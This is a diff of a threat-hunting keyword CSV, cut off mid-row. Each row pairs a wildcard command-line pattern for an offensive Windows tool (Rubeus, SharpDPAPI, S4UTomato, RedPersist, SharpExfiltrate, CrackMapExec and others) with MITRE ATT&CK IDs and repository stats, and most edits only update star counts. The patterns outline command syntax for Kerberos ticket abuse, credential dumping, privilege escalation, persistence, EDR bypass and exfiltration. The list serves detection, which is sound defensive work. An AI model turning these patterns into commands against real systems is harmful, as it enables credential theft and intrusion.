*","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/GhostPack/Seatbelt","1","0","fp risks","N/A","10","3137","606","2023-07-06T06:16:29Z","2018-07-24T17:38:51Z" -"*.exe hash /password:*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). 
Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3453","709","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" -"*.exe -i -c powershell.exe*","offensive_tool_keyword","printspoofer","Abusing impersonation privileges through the Printer Bug","T1134 - T1003 - T1055","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrintSpoofer","1","0","N/A","10","10","1569","321","2020-09-10T17:49:41Z","2020-04-28T08:26:29Z" +"*.exe -group=all *","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/GhostPack/Seatbelt","1","0","fp risks","N/A","10","3139","606","2023-07-06T06:16:29Z","2018-07-24T17:38:51Z" +"*.exe -group=all -full*","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. 
and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/GhostPack/Seatbelt","1","0","fp risks","N/A","10","3139","606","2023-07-06T06:16:29Z","2018-07-24T17:38:51Z" +"*.exe -group=remote *","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/GhostPack/Seatbelt","1","0","fp risks","N/A","10","3139","606","2023-07-06T06:16:29Z","2018-07-24T17:38:51Z" +"*.exe -group=system *","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/GhostPack/Seatbelt","1","0","fp risks","N/A","10","3139","606","2023-07-06T06:16:29Z","2018-07-24T17:38:51Z" +"*.exe -group=user *","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. 
and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/GhostPack/Seatbelt","1","0","fp risks","N/A","10","3139","606","2023-07-06T06:16:29Z","2018-07-24T17:38:51Z" +"*.exe hash /password:*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"*.exe -i -c powershell.exe*","offensive_tool_keyword","printspoofer","Abusing impersonation privileges through the Printer Bug","T1134 - T1003 - T1055","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrintSpoofer","1","0","N/A","10","10","1573","321","2020-09-10T17:49:41Z","2020-04-28T08:26:29Z" "*.exe kdsinfo --guid *","offensive_tool_keyword","GoldenGMSA","GolenGMSA tool for working with GMSA passwords","T1003.004 - T1078.003 - T1059.006","TA0006 - TA0004 - TA0002","N/A","N/A","Credential Access","https://github.com/Semperis/GoldenGMSA","1","0","N/A","7","2","113","17","2023-07-03T09:35:48Z","2022-02-03T10:32:05Z" -"*.exe krbscm -c *cmd.exe*","offensive_tool_keyword","S4UTomato","Escalate Service Account To LocalSystem via Kerberos","T1558 - T1558.002 - T1548.002 - T1078 - T1078.004","TA0006 - TA0004 - TA0005","N/A","N/A","Privilege 
Escalation","https://github.com/wh0amitz/S4UTomato","1","0","N/A","10","4","315","58","2023-09-14T08:53:19Z","2023-07-30T11:51:57Z" +"*.exe krbscm -c *cmd.exe*","offensive_tool_keyword","S4UTomato","Escalate Service Account To LocalSystem via Kerberos","T1558 - T1558.002 - T1548.002 - T1078 - T1078.004","TA0006 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/S4UTomato","1","0","N/A","10","4","316","58","2023-09-14T08:53:19Z","2023-07-30T11:51:57Z" "*.exe -l * -c {B91D5831-B1BD-4608-8198-D72E155020F7}*","offensive_tool_keyword","JuicyPotatoNG","Another Windows Local Privilege Escalation from Service Account to System","T1055.002 - T1078.003 - T1070.004","TA0005 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/JuicyPotatoNG","1","0","N/A","10","8","703","90","2022-11-12T01:48:39Z","2022-09-21T17:08:35Z" "*.exe -l * -c {F7FD3FD6-9994-452D-8DA7-9A8FD87AEEF4} -a*","offensive_tool_keyword","JuicyPotatoNG","Another Windows Local Privilege Escalation from Service Account to System","T1055.002 - T1078.003 - T1070.004","TA0005 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/JuicyPotatoNG","1","0","N/A","10","8","703","90","2022-11-12T01:48:39Z","2022-09-21T17:08:35Z" -"*.exe machinetriage*","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","0","N/A","10","10","959","187","2023-08-28T19:03:12Z","2018-08-22T17:39:31Z" -"*.exe masterkeys /hashes*","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","0","N/A","10","10","959","187","2023-08-28T19:03:12Z","2018-08-22T17:39:31Z" -"*.exe masterkeys 
/hashes*","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","0","N/A","10","10","959","187","2023-08-28T19:03:12Z","2018-08-22T17:39:31Z" +"*.exe machinetriage*","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","0","N/A","10","10","961","187","2023-08-28T19:03:12Z","2018-08-22T17:39:31Z" +"*.exe masterkeys /hashes*","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","0","N/A","10","10","961","187","2023-08-28T19:03:12Z","2018-08-22T17:39:31Z" +"*.exe masterkeys /hashes*","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","0","N/A","10","10","961","187","2023-08-28T19:03:12Z","2018-08-22T17:39:31Z" "*.exe monitor /interval:5 /nowrap","offensive_tool_keyword","AD exploitation cheat sheet","Unconstrained delegation Exploitation with Rubeus","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*.exe NonstandardProcesses*","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. 
and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/GhostPack/Seatbelt","1","0","N/A","N/A","10","3137","606","2023-07-06T06:16:29Z","2018-07-24T17:38:51Z" -"*.exe NTLMSettings*","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/GhostPack/Seatbelt","1","0","N/A","N/A","10","3137","606","2023-07-06T06:16:29Z","2018-07-24T17:38:51Z" +"*.exe NonstandardProcesses*","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/GhostPack/Seatbelt","1","0","N/A","N/A","10","3139","606","2023-07-06T06:16:29Z","2018-07-24T17:38:51Z" +"*.exe NTLMSettings*","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. 
and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/GhostPack/Seatbelt","1","0","N/A","N/A","10","3139","606","2023-07-06T06:16:29Z","2018-07-24T17:38:51Z" "*.exe OneDrive --username * --password * --filepath *\*.exe*","offensive_tool_keyword","SharpExfiltrate","Modular C# framework to exfiltrate loot over secure and trusted channels.","T1027 - T1567 - T1561","TA0010 - TA0040 - TA0005","N/A","N/A","Data Exfiltration","https://github.com/Flangvik/SharpExfiltrate","1","0","N/A","10","2","116","26","2021-09-12T17:08:02Z","2021-09-08T13:17:00Z" "*.exe --override-file --source-file *.exe*","offensive_tool_keyword","ContainYourself","Abuses the Windows containers framework to bypass EDRs.","T1562 - T1562.004 - T1212 - T1212.002 - T1055 - T1055.015","TA0005","N/A","N/A","Defense Evasion","https://github.com/deepinstinct/ContainYourself","1","0","N/A","10","3","257","31","2023-08-31T07:26:22Z","2023-07-12T14:47:24Z" "*.exe ptt /ticket:*","offensive_tool_keyword","AD exploitation cheat sheet","Unconstrained delegation Exploitation with Rubeus","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*.exe -ptt ticket:*.kirbi*","offensive_tool_keyword","GIUDA","Ask a TGS on behalf of another user without password","T1558.003 - T1059.003","TA0006 - TA0002","N/A","N/A","Exploitation tools","https://github.com/foxlox/GIUDA","1","0","N/A","9","4","387","50","2023-09-28T15:54:16Z","2023-07-19T15:37:07Z" -"*.exe --pwsh *.ps1 *.exe*","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - 
TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","10","2","133","19","2023-09-25T19:58:47Z","2023-08-13T22:10:46Z" -"*.exe -q InterestingProcesses*","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/GhostPack/Seatbelt","1","0","N/A","N/A","10","3137","606","2023-07-06T06:16:29Z","2018-07-24T17:38:51Z" -"*.exe -q PowerShell*","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/GhostPack/Seatbelt","1","0","N/A","N/A","10","3137","606","2023-07-06T06:16:29Z","2018-07-24T17:38:51Z" -"*.exe -q WindowsDefender*","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. 
and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/GhostPack/Seatbelt","1","0","N/A","N/A","10","3137","606","2023-07-06T06:16:29Z","2018-07-24T17:38:51Z" -"*.exe rbcd -m * -p * -c *cmd.exe*","offensive_tool_keyword","S4UTomato","Escalate Service Account To LocalSystem via Kerberos","T1558 - T1558.002 - T1548.002 - T1078 - T1078.004","TA0006 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/S4UTomato","1","0","N/A","10","4","315","58","2023-09-14T08:53:19Z","2023-07-30T11:51:57Z" +"*.exe -ptt ticket:*.kirbi*","offensive_tool_keyword","GIUDA","Ask a TGS on behalf of another user without password","T1558.003 - T1059.003","TA0006 - TA0002","N/A","N/A","Exploitation tools","https://github.com/foxlox/GIUDA","1","0","N/A","9","4","388","50","2023-09-28T15:54:16Z","2023-07-19T15:37:07Z" +"*.exe --pwsh *.ps1 *.exe*","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","10","2","134","20","2023-09-25T19:58:47Z","2023-08-13T22:10:46Z" +"*.exe -q InterestingProcesses*","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. 
and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/GhostPack/Seatbelt","1","0","N/A","N/A","10","3139","606","2023-07-06T06:16:29Z","2018-07-24T17:38:51Z" +"*.exe -q PowerShell*","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/GhostPack/Seatbelt","1","0","N/A","N/A","10","3139","606","2023-07-06T06:16:29Z","2018-07-24T17:38:51Z" +"*.exe -q WindowsDefender*","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. 
and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/GhostPack/Seatbelt","1","0","N/A","N/A","10","3139","606","2023-07-06T06:16:29Z","2018-07-24T17:38:51Z" +"*.exe rbcd -m * -p * -c *cmd.exe*","offensive_tool_keyword","S4UTomato","Escalate Service Account To LocalSystem via Kerberos","T1558 - T1558.002 - T1548.002 - T1078 - T1078.004","TA0006 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/S4UTomato","1","0","N/A","10","4","316","58","2023-09-14T08:53:19Z","2023-07-30T11:51:57Z" "*.exe --remove-reparse --source-file *.exe*","offensive_tool_keyword","ContainYourself","Abuses the Windows containers framework to bypass EDRs.","T1562 - T1562.004 - T1212 - T1212.002 - T1055 - T1055.015","TA0005","N/A","N/A","Defense Evasion","https://github.com/deepinstinct/ContainYourself","1","0","N/A","10","3","257","31","2023-08-31T07:26:22Z","2023-07-12T14:47:24Z" "*.exe -s * -c service_mod *","offensive_tool_keyword","CIMplant","C# port of WMImplant which uses either CIM or WMI to query remote systems","T1047 - T1059.001 - T1021.006","TA0002 - TA0007 - TA0008","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/RedSiege/CIMplant","1","0","N/A","10","2","189","30","2021-07-14T18:18:42Z","2021-01-29T21:41:58Z" "*.exe -s *\x*\x*\x*","offensive_tool_keyword","frampton","PE Binary Shellcode Injector - Automated code cave discovery. 
shellcode injection - ASLR bypass - x86/x64 compatible","T1055 - T1548.002 - T1129 - T1001","TA0002 - TA0003- TA0004 -TA0011","N/A","N/A","POST Exploitation tools","https://github.com/ins1gn1a/Frampton","1","1","N/A","N/A","1","69","16","2019-11-24T22:34:48Z","2019-10-29T00:22:14Z" "*.exe s4u /ticket:* /impersonateuser:* /msdsspn:* /ptt*","offensive_tool_keyword","AD exploitation cheat sheet","Rubeus Use s4u2self and s4u2proxy to impersonate the DA user to the allowed SPN","T1550 - T1555 - T1212 - T1558","N/A","N/A","N/A","Exploitation tools","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*.exe s4u /user:* /impersonateuser:* /msdsspn:* /altservice:ldap /ptt /rc4*","offensive_tool_keyword","AD exploitation cheat sheet","Rubeus access the LDAP service on the DC (for dcsync)","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*.exe --schedule * *.exe*","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","10","2","133","19","2023-09-25T19:58:47Z","2023-08-13T22:10:46Z" -"*.exe --screensaver *:\*.exe*","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","10","2","133","19","2023-09-25T19:58:47Z","2023-08-13T22:10:46Z" +"*.exe --schedule * *.exe*","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - 
TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","10","2","134","20","2023-09-25T19:58:47Z","2023-08-13T22:10:46Z" +"*.exe --screensaver *:\*.exe*","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","10","2","134","20","2023-09-25T19:58:47Z","2023-08-13T22:10:46Z" "*.exe Search Find-Persist*","offensive_tool_keyword","COM-Hunter","COM-hunter is a COM Hijacking persistnce tool written in C#","T1122 - T1055.012","TA0003 - TA0005","N/A","N/A","Persistence","https://github.com/nickvourd/COM-Hunter","1","0","N/A","10","3","215","39","2023-09-06T09:48:55Z","2022-05-26T19:34:59Z" "*.exe --set-reparse override --source-file *.exe --target-file *","offensive_tool_keyword","ContainYourself","Abuses the Windows containers framework to bypass EDRs.","T1562 - T1562.004 - T1212 - T1212.002 - T1055 - T1055.015","TA0005","N/A","N/A","Defense Evasion","https://github.com/deepinstinct/ContainYourself","1","0","N/A","10","3","257","31","2023-08-31T07:26:22Z","2023-07-12T14:47:24Z" -"*.exe shadowcred -c * -f*","offensive_tool_keyword","S4UTomato","Escalate Service Account To LocalSystem via Kerberos","T1558 - T1558.002 - T1548.002 - T1078 - T1078.004","TA0006 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/S4UTomato","1","0","N/A","10","4","315","58","2023-09-14T08:53:19Z","2023-07-30T11:51:57Z" +"*.exe shadowcred -c * -f*","offensive_tool_keyword","S4UTomato","Escalate Service Account To LocalSystem via Kerberos","T1558 - T1558.002 - T1548.002 - T1078 - T1078.004","TA0006 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/S4UTomato","1","0","N/A","10","4","316","58","2023-09-14T08:53:19Z","2023-07-30T11:51:57Z" "*.exe -sniffer n*","offensive_tool_keyword","Inveigh",".NET IPv4/IPv6 machine-in-the-middle tool 
for penetration testers","T1550.002 - T1059.001 - T1071.001","TA0002","N/A","N/A","Sniffing & Spoofing","https://github.com/Kevin-Robertson/Inveigh","1","0","N/A","10","10","2212","441","2023-06-13T01:36:42Z","2015-04-02T18:04:41Z" -"*.exe --startup *:\*.exe*","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","10","2","133","19","2023-09-25T19:58:47Z","2023-08-13T22:10:46Z" -"*.exe -t startupfolder -c * -a * -f*","offensive_tool_keyword","SharPersist","SharPersist Windows persistence toolkit written in C#.","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/fireeye/SharPersist","1","0","N/A","10","10","1150","233","2023-08-11T00:52:09Z","2019-06-21T13:32:14Z" -"*.exe -t tortoisesvn -c * -a * -m*","offensive_tool_keyword","SharPersist","SharPersist Windows persistence toolkit written in C#.","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/fireeye/SharPersist","1","0","N/A","10","10","1150","233","2023-08-11T00:52:09Z","2019-06-21T13:32:14Z" +"*.exe --startup *:\*.exe*","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","10","2","134","20","2023-09-25T19:58:47Z","2023-08-13T22:10:46Z" +"*.exe -t startupfolder -c * -a * -f*","offensive_tool_keyword","SharPersist","SharPersist Windows persistence toolkit written in C#.","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/fireeye/SharPersist","1","0","N/A","10","10","1151","233","2023-08-11T00:52:09Z","2019-06-21T13:32:14Z" +"*.exe -t tortoisesvn -c * -a * -m*","offensive_tool_keyword","SharPersist","SharPersist 
Windows persistence toolkit written in C#.","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/fireeye/SharPersist","1","0","N/A","10","10","1151","233","2023-08-11T00:52:09Z","2019-06-21T13:32:14Z" "*.exe -t wl-extract.dll -d *.dat -r *.rsa -*.exe*","offensive_tool_keyword","whatlicense","WinLicense key extraction via Intel PIN","T1056 - T1056.001 - T1518 - T1518.001","TA0005 - TA0006","N/A","N/A","Exploitation tools","https://github.com/charlesnathansmith/whatlicense","1","0","N/A","6","1","61","5","2023-07-23T03:10:44Z","2023-07-10T11:57:44Z" "*.exe triage","offensive_tool_keyword","AD exploitation cheat sheet","Unconstrained delegation Exploitation with Rubeus","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*.exe triage /password:*","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","0","N/A","10","10","959","187","2023-08-28T19:03:12Z","2018-08-22T17:39:31Z" -"*.exe -uac","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! 
Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","0","N/A","N/A","3","271","33","2023-08-17T02:45:17Z","2023-06-10T03:30:59Z" +"*.exe triage /password:*","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","0","N/A","10","10","961","187","2023-08-28T19:03:12Z","2018-08-22T17:39:31Z" +"*.exe -uac","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","0","N/A","N/A","3","272","33","2023-08-17T02:45:17Z","2023-06-10T03:30:59Z" "*.exe --ui *","offensive_tool_keyword","blackcat ransomware","BlackCat Ransomware behavior","T1486.001 - T1489 - T1490 - T1486","TA0011 - TA0010 - TA0012 - TA0007 - TA0040","blackcat ransomware","N/A","Ransomware","https://www.sentinelone.com/labs/blackcat-ransomware-highly-configurable-rust-driven-raas-on-the-prowl-for-victims/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*.exe --winlogon * *:\*.exe*","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","10","2","133","19","2023-09-25T19:58:47Z","2023-08-13T22:10:46Z" -"*.exe --wmi *:\*.exe*","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","10","2","133","19","2023-09-25T19:58:47Z","2023-08-13T22:10:46Z" 
-"*.exe* -d localhost * -u * -p */24*","offensive_tool_keyword","crackmapexec","windows default copiled executable name for crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*.exe --winlogon * *:\*.exe*","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - 